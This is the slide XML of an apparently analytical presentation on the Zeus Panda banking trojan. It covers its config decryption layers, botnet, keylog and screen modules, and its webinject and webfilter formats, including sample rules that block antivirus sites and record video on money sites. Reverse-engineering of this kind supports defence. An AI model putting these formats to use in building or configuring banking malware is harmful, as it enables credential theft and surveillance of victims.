          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3352800"/>
            <a:ext cx="10590500" cy="1873250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="997380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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offset 0x0: SHA256 digest (32 bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offset 0x20: AES256 IV (16 bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offset 0x30: AES256 CBC encrypted data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The key will be the randomly generated AES key sent along in the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Base64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Response Data Decryption Layer 1 (2.2.1 - present)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4057971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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decrypt Me Like One of your BaseConfigs (Layer 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{853D88B5-9466-C745-9433-312F2CE401FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1376515"/>
            <a:ext cx="10982706" cy="2705100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2631432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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decrypt Me Like One of your BaseConfigs (Layer 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D31B9EE-7FAD-544E-B3AC-3B5116B7A126}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1376515"/>
            <a:ext cx="11738919" cy="1930400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="592292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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="381000"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic Config</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07D68AF5-06E4-AC41-904A-BE7774675C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1249362"/>
            <a:ext cx="7241130" cy="5169942"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="862284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Dynamic Botnets (“botnet“)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="62484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C5957CD3-7D98-1E42-BE8B-0560AE20BA29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466850" y="997912"/>
            <a:ext cx="9258300" cy="5232319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9926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“keylog_process” and “screen_process”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="62484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181B2598-1356-9E47-925D-919ED44D225F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978025" y="934372"/>
            <a:ext cx="8235950" cy="5359399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="566239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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="381000"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Man-in-the-Browser Module (“url_plugin_webinjectXX”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FE38579-12C9-7742-9073-442E4BDF5465}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="615287" y="1376515"/>
            <a:ext cx="9753600" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>”Man-in-the-browser (MITB, MitB, MIB, MiB), a form of Internet threat related to man-in-the-middle (MITM), is a proxy Trojan horse[1] that infects a web browser by taking advantage of vulnerabilities in browser security to modify web pages, modify transaction content or insert additional transactions, all in a completely covert fashion invisible to both the user and host web application.”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Source: https://en.wikipedia.org/wiki/Man-in-the-browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369677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Zeus Panda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F559E3A-9E8D-3249-8278-9BEF6206E960}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625642" y="6019800"/>
            <a:ext cx="4335482" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Source: https://github.com/Visgean/Zeus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E05EA89C-EE57-7143-96DE-815FE0766D1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="625642" y="1044903"/>
            <a:ext cx="8426450" cy="4938802"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2233408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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“webfilters”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“webinjects”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“webinject1data”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“webinject2data”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“webinjectXdata”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects (“url_webinjects”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16855610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r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.&lt;antivirus&gt;* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-&gt; block access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://&lt;uninteresting calendar&gt;.com/* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-&gt; don't log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://&lt;funny money&gt;.com/* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>take video</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects (“webfilters”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3843652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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flags (WORD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Size (WORD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Target offset (WORD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Target (regex string)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects (“webinjects”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EA1B1FF-BE05-474F-92B6-D3A03FAD9611}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3352800"/>
            <a:ext cx="11087100" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3769481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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data size (WORD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flags (WORD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where or how</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects (“webinjectXdata”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CBD4D10-9C4B-F941-869A-3EFEDC235324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3048000"/>
            <a:ext cx="11049000" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26161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102EBEE-42E7-D34A-8881-7A6B814470E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1143000"/>
            <a:ext cx="10972800" cy="4151870"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects for Humans</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3383078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6515"/>
            <a:ext cx="5486400" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Random data (20-bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Size (DWORD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flags (DWORD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section count (DWORD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MD5 (16-bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
